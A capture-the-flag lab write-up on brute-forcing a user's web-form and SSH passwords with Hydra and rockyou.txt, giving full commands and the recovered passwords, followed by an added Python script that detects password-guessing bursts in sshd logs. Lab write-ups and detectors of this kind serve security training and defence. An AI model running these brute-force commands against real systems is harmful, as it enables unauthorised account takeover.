1. Use Hydra to bruteforce molly’s web password. What is flag 1?
Scan open ports
nmap -p- <ip>
Access the HTTP site and try logging in to see what happens.
It seems I don’t have the correct credentials.
View source shows nothing.
Intercept with Burp Suite. It’s a POST request.
Try SQL injection, but it doesn’t work either.
Without any further information, I’ll have to brute-force with Hydra.
Craft the command.
hydra -l molly -P rockyou.txt <ip> http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -V
Run the command
Result -> molly:sunshine
Log in; now I have the first flag.
2. Use Hydra to bruteforce molly’s SSH password. What is flag 2?
hydra -l molly -P Desktop/rockyou.txt 10.10.138.145 ssh -t 4
Result -> molly:butterfly
SSH login
ssh molly@<ip>
Read flag file
ls
cat flag2.txt
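Seen from the target's side, the SSH run above appears in the sshd authentication log as a burst of failed passwords for one account from one source, ending in an accepted one. The following is an added example, not part of the original write-up, that flags that pattern; the log lines are constructed, and the function name and the threshold of 5 are assumptions.

```python
import re
from collections import defaultdict

# sshd password events; "invalid user" appears when the account does not exist.
EVENT = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port"
)

# Constructed sample log (not from the write-up); addresses are documentation ranges.
SAMPLE_LOG = "\n".join(
    [f"Mar  1 10:00:0{i} host sshd[{1000 + i}]: Failed password for molly "
     f"from 203.0.113.7 port {40000 + i} ssh2" for i in range(8)]
    + ["Mar  1 10:00:09 host sshd[1009]: Accepted password for molly from 203.0.113.7 port 40009 ssh2",
       # One typo followed by a success: normal user behaviour, must not alert.
       "Mar  1 10:05:00 host sshd[1100]: Failed password for alice from 198.51.100.20 port 51000 ssh2",
       "Mar  1 10:05:08 host sshd[1101]: Accepted password for alice from 198.51.100.20 port 51001 ssh2"]
    + [f"Mar  1 10:06:0{i} host sshd[{1200 + i}]: Failed password for invalid user admin "
       f"from 203.0.113.9 port {42000 + i} ssh2" for i in range(6)]
)


def detect_password_guessing(log_text, threshold=5):
    """Report (source, user) pairs with >= threshold failures since their last success."""
    failures = defaultdict(int)
    findings = []
    for line in log_text.splitlines():
        match = EVENT.search(line)
        if not match:
            continue
        outcome, user, ip = match.groups()
        if outcome == "Failed":
            failures[(ip, user)] += 1
            continue
        # Accepted login: a success right after a failure burst means the password was guessed.
        if failures[(ip, user)] >= threshold:
            findings.append({"user": user, "ip": ip,
                             "failures": failures[(ip, user)], "outcome": "guessed"})
        failures[(ip, user)] = 0
    for (ip, user), count in failures.items():
        if count >= threshold:  # burst with no success yet: guessing still in progress
            findings.append({"user": user, "ip": ip, "failures": count, "outcome": "ongoing"})
    return findings


if __name__ == "__main__":
    for finding in detect_password_guessing(SAMPLE_LOG):
        print(finding)
```

A "guessed" finding is the case that matters most, since it means the account's password is known to the source and should be rotated; a production rule would also bound the failures by a time window.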